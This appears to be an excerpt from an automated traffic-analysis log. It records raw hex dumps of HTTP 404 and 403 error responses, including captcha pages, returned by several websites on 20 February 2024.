Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Tue, 20 Feb 2024 23:26:10 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: pPaKEUtW/rKMDspaeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1708471570.6871477704572112308Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLg+F4RAy97FgBhKEMuS3Uv05XEckg9t2+jA6cQOj+vGJ,2d58ifebGbosy5xc+FRalr4A1m7kKRXi8+FkxeRlAe1B1EZ589CNM0S0ZfiAm0M2iZTn0AJpZgJ+dSNFbL8SDA==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,Av/qWudICkhRTCN8pPYKz67T02HXAs3+PXof1ish5pM=,HFwuyehutl8tT21go4rzKQuGWFn2wMQWjizQyxww5Ro=,/j+AjfLiOiE0Vc9NsP8sK3wn3HKfNyHsngqdvH35wynwHI026nY8X82AVI4uc6ntz725C8t8ZYCuhGMAdFHN2Q==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 34 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 96 9b cc 6e 26 05 e8 b2 0c cb cb 50 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff bd 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 31 e7 8c 71 7e 71 74 94 1d 97 b6 08 eb 06 58 15 6a 7d 81 67 ce 8f 18 7e e8 36 23 1a 33 0b 2e 9b 26 8f 96 6a 75 e5 9c 75 ef e5 02 fc bb a6 89 e8 01 c8 f2 02 df 67 35 04 c9 8c ac 21 8f ee 14 2c 1b eb 42 c4 0a 6b 02 98 40 ac 65 a8 f2 12 ee 54 01 bc 3b 9c 28 a3 82 92 9a fb 42 6a c8 d3 13 56 cb 95 aa db fa 3f 42 eb c1 75 27 39 c3 17 c6 a2 be 8d a2 a2 92 ce 03 0a 6e c3 9c 4f 77 2e aa 10 1a 0e 5f 5a 75 97 47 7f f3 0f ef f8 a5 ad 1b 19 14 4a d8 31 e7 fa 2a 87 72 01 3d 5f 50 41 03 81 9c 29 53 e6 51 dc 20 bc cf 1d 31 66 ff b2 e0 a4 f1 5a 06 7c 9c 89 8e fa 10 6e 09 be 70 aa 09 ca 9a 1d 15 3b 36 1d e0 95 3d 2e 67 67 36 f8 1d b9 c6 a2 95 b0 3a 61 c6 ce ad d6 76 d9 b3 6c 03 4a a1 cb b4 32 b7 8c 82 9a 47 aa 46 38 a2 31 8b 88 55 0e e6 79 24 c4 72 b9 4c 30 96 49 61 6b 31 97 18 12 6b 12 fc 8a 98 03 9d 47 be c2 d0 15 6d 60 44 df 13 de 8b de 48 f2 01 5d 5b 24 8d 74 d2 07 eb 50 53 27 14 e3 46 81 f6 22 54 ca 95 1c af c3 5a cc 31 17 bc f8 1d f4 1d 20 8f ec ce bf c9 02 39 3c e2 eb 55 87 b5 06 5f 01 60 ea f4 d6 07 58 05 d1 3d 10 9d db 77 60 f6 96 ec f1 3d d5 34 74 00 6f da 99 56 85 48 93 49 fa 36 19 09 df a9 17 40 39 8e 46 63 92 0f a4 ce c4 fb fa 33 d1 67 7e 36 b3 e5 9a 69 69 16 79 04 18 7f Data Ascii: 444Vo6_E-n&Pl((Z:[L(R%Fw9ql7c1q~qtXj}g~6#3.&juug5!,Bk@eT;(BjV?Bu'9nOw._ZuGJ1*r=_PA)SQ 1fZ\|np;6=.gg6:avlJ2GF81Uy$rL0Iak1kGm`DH][$tPS'F"TZ1 9<U_`X=w`=4toVHI6@9Fc3g~6iiy
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTServer: ApacheContent-Length: 268Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Date: Tue, 20 Feb 2024 23:26:10 GMTServer: ApacheX-Powered-By: PHP/7.3.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://www.netzschnipsel.de/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 32 35 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d df 72 db b8 92 f7 75 5c 75 de 01 66 76 23 69 47 a4 44 49 fe 27 5b 9e e3 c4 4e c6 33 71 92 cf 72 36 7b 36 49 b9 28 09 92 18 53 a4 86 a4 2c 3b 99 bc c9 56 ed cd 79 86 bd 9a bb bc d8 fe 1a 00 ff 49 b4 4c 39 39 5f 6d 6d 6d 52 b6 25 12 40 37 1a dd 8d 46 77 03 38 d8 3c 7e fd ec e2 6f 6f 4e d8 38 9c 38 87 1b 07 f4 87 f5 1d 2b 08 3a 9a eb e9 9f 02 8d 39 96 3b ea 68 03 ae 1f 9f 68 ec 66 e2 b8 41 7b d8 eb 68 e3 30 9c b6 6b 35 6f 34 35 26 bc e6 06 b5 61 ef 71 f4 de 1a 0c c2 b1 8d 26 54 a1 f9 7c 6e a8 67 46 df 9b d4 c6 dc 99 d6 ac a9 ad 07 53 de d7 18 c1 e5 d6 e0 70 83 b1 83 09 0f 2d d6 1f 5b 7e c0 c3 8e f6 f6 e2 b9 be ab 25 2f 5c 6b c2 3b da b5 cd e7 53 cf 0f 35 d6 f7 dc 90 bb 28 38 b7 01 b1 33 e0 d7 76 9f eb e2 4b 95 d9 ae 1d da 96 a3 07 7d cb e1 1d d3 a8 cb 86 1c db bd 62 3e 77 3a da d4 f7 86 b6 c3 35 36 f6 f9 30 46 76 34 99 8e 0c cf 1f d5 6e 86 6e cd 34 97 2a d9 ee a8 67 f5 af 16 6a 51 17 5d 1e 7e 0e fa 63 d7 9e 06 dc 31 06 bc 06 6a f9 d3 be 31 1d 4f d1 0a f5 2e b4 43 87 1f 76 b9 1d 72 e6 da fd 71 c8 46 7c 38 73 07 dc 65 4f 1e ef 36 4c 73 9f bd 4a 37 c2 06 dc 67 5d af 8f 6e b0 33 3e b0 2d f6 d4 f1 46 07 35 d9 ce c6 41 d0 f7 ed 69 78 38 f0 fa b3 09 e8 60 44 1f 4e 1c 2e be 8b 91 7c 05 a2 b1 0e 8b de dd 5d c8 f0 f9 d4 b1 fa bc ac 86 be aa 61 fc 2b fb 07 35 05 66 e3 20 a6 5d 69 e0 06 fa 14 64 e3 61 7f 5c 92 04 2c d5 6a 79 54 28 b1 1a 06 f8 be 9a 81 31 27 a2 2f 14 d6 2c 27 e4 be 6b 85 18 a4 f0 76 8a b1 b7 a6 53 c7 ee 5b a1 ed b9 35 3f 08 7e 02 89 f1 8a c8 da d1 0a 90 8e 3d f1 ad df 67 de 3e 7b ce f9 a0 c8 10 0e 51 ae a6 65 bb f0 8f c3 ea 37 6f 42 e3 66 f9 7a 51 fc 20 4e 54 03 e2 17 23 fa e8 91 e2 0b 45 b2 90 df 84 b5 4f d6 b5 25 87 11 ac f8 e8 d1 a3 b9 ed 0e bc b9 71 39 9f f2 89 f7 c9 ee f2 30 04 63 07 e0 93 2f 5a cf 0a f8 5b df d1 da 42 7e 83 f6 87 da 87 9a 1a 9f 0f 35 7b 62 8d 78 f0 a1 d6 f7 7c fe a1 26 2a 7f a8 35 8c 86 61 7e a8 ed 34 6e 76 1a 1f 6a 5a 55 03 48 54 37 a6 ee 08 5f 82 eb d1 83 9a 43 3d d1 18 fe 9e c8 f6 f0 89 da f3 66 7e 9f 6b ed 2f 1a e4 1f bc 20 90 50 d8 0a 64 f3 d8 f0 43 6d 3e d5 6d b7 ef cc 06 84 fe 27 fc e0 81 a8 aa 43 1b 70 f4 d9 98 d8 ae f1 29 f8 f9 9a fb 9d 96 b1 63 34 76 b5 af 5f f7 89 5a 9b 10 d2 3e f1 5c 39 ac 5a 55 5e f9 72 6d f9 cc af ba 55 bb ea 75 2c a3 ef 73 60 a1 84 ae ac f5 2d 17 c4 d6 2a 55 a7 e3 19 23 1e 3e 23 2d 75 13 3e 79 92 fe 56 d6 1a 03 08 57 d4 30 eb 97 43 d9 2c 5f 6e 50 0d 5c 65 9f 1b 81 df ef 84 55 0e ed 32 04 96 dc 90 52 b1 38 c4 55 8b e0 2a 84 82 a7 b7 17 d6 88 b4 40 59 23 3d ab 55 de d7 3f 1a 10 24 ee 0e 9e 8d 6d 67 50 e6 95 af 43 cf 2f db 9d 23 df
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Tue, 20 Feb 2024 23:26:10 GMTContent-Length: 13695Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wefttechnologies.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc b2 eb 76 dc c6 d5 2d fa 5b 7a 8a 12 72 b6 45 7e 21 d0 75 af 02 c5 96 b7 dd 76 3e 65 0f 2a c9 89 1c 66 6f 39 1e 1e 60 a3 ba 1b 36 1a e8 00 68 36 19 45 63 9c d7 38 af 77 9e e4 cc 2a a0 2f a4 28 89 b6 ec 24 4a cc c6 aa 75 99 73 cd 35 cf 9e c4 f1 59 eb a6 5d 51 57 64 5a 66 6d 3b 8e ae 0a b7 59 d5 4d 17 3d 8f e3 e7 8f cf 50 41 86 7f 67 79 71 45 8a 7c 1c b5 d3 a6 2e cb 78 5a 57 5d 56 54 ae 89 b6 bd ef 24 86 19 79 3d ed 6e 56 8e 2c ba 65 89 d8 ff 90 32 ab e6 e3 c8 55 f1 5f 5e 45 fe cd 65 f9 f3 c7 8f ce 96 ae cb c8 74 91 35 ad eb c6 d1 5f be f9 5d 6c a3 dd 7b 95 2d dd 01 43 e2 81 5c 85 ba 4d 91 77 8b 71 ee ae 8a a9 8b 43 70 42 8a aa e8 8a ac 8c db 69 56 ba 31 0b 53 ca a2 fa 91 34 ae 1c 47 ab a6 9e 15 a5 8b c8 a2 71 b3 71 b4 e8 ba 55 7b 3a 1a cd 97 ab 79 52 37 f3 d1 f5 ac 1a 31 df 14 36 0f e8 68 59 b9 a6 bb 19 47 f5 fc b4 ac fd d8 03 0a ae fa 1e 9b 90 d1 8e ec ad 72 bf fe 21 5f 77 d9 16 9d 3b 2c 0f bb 3d 6d ea cb ba 6b 9f ee 2a 9f 56 75 51 e5 ee fa 84 cc a0 6c bd 79 ea 3b d0 e2 cf f2 cd a2 68 89 1f 43 f0 5b af ba 62 59 fc c3 e5 64 53 74 0b d2 2d 1c f9 3f 75 d6 76 e4 d5 d7 7f 24 ab 72 3d 2f 2a 72 c5 59 62 49 4c b6 cb de f8 82 64 5a 2f 47 9b ba c9 57 8d 6b db 51 5f da 8e 5a 57 8f 88 bf de a3 b3 ae e8 4a f7 fc 4f d9 dc 91 aa ee 40 64 5d e5 98 f2 aa 9e 75 9b ac 71 e4 2b 77 e5 ca 7a b5 04 5f 32 a9 97 ab ac ba 21 ff 24 7f 75 b3 8e 7c e3 a6 8b aa 2e eb 79 e1 da b3 51 3f e8 5e 7d 7e aa 9c 7e d2 41 f5 27 93 7b 2f 92 d7 f7 7b 7f 9b 03 b4 9f 39 bc 9d 36 c5 aa 23 de 0a e3 28 5b ad ca 62 9a 75 45 5d 8d ca fc b7 3f b4 75 05 84 32 6b db 71 14 ee 02 df 2e dc 32 8b e7 4d b6 5a 44 cf df 44 ff 33 e0 5f 77 d1 e9 ce ad 7d 89 f7 6b 74 12 fd cf be f2 f4 5b 94 06 bb 9d 46 7f 75 97 af bc cd 90 2c f2 83 be 0d 18 76 07 04 83 07 7e b3 35 e5 49 b4 6e ca 8f 55 a3 2a a8 72 fa d3 d5 38 89 72 d7 6b 81 e5 31 e0 65 7d 59 94 8e 7c b1 5a dd 37 02 e5 ab da eb 5e 64 e5 17 d3 be e5 60 c5 57 2e 6b a6 8b 21 71 12 75 59 33 77 90 68 5f f0 75 d5 35 37 7f aa 8b aa eb 17 fb c6 2d 57 65 d6 b9 8f 2d f8 79 3b 7e d3 86 e1 df 77 ae 59 7e df 76 4d 51 cd df 46 6f 4f a2 bf af 5d 73 13 17 d5 6a ed 8f d1 b8 bf af 8b c6 e5 c4 eb 31 7e b7 25 7a fb dd 49 54 54 e7 59 35 5f c3 a6 e8 70 55 0c 6f bf fd ee ed d9 a8 d7 c1 bb e3 49 1c 93 11 f9 3f fe f4 e4 d5 d7 7f 24 ab 72 3d 2f aa 84 c4 f1 f3 c7 8f 1f 9f 95 45 f5 23 69 5c 09 e7 94 18 5e f9 0d ee b1 52 d3 b6 bf bd 5e 96 48 15 5d e9 7e ba 55 c9 67 4d f6 f7 75 fd 8c fc ce b9 3c 22 8b c6 cd c6 1f d6 69 86 c2 51 70 f8 bf 9c 23 6a 7c 6d fb 70 b2 d3 a1 e3 90 f5 f6 04 9b a2 ca eb 4d f2 fd 66 e5 96 f5 0f c5 2b d7 75 b8 5e 4b c6 e4
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Tue, 20 Feb 2024 23:26:10 GMTContent-Length: 13691Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:10 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 21Connection: keep-aliveData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 5b 43 46 4e 20 23 30 30 30 35 5d Data Ascii: Not Found [CFN #0005]
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:11 GMTServer: ApacheContent-Length: 268Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 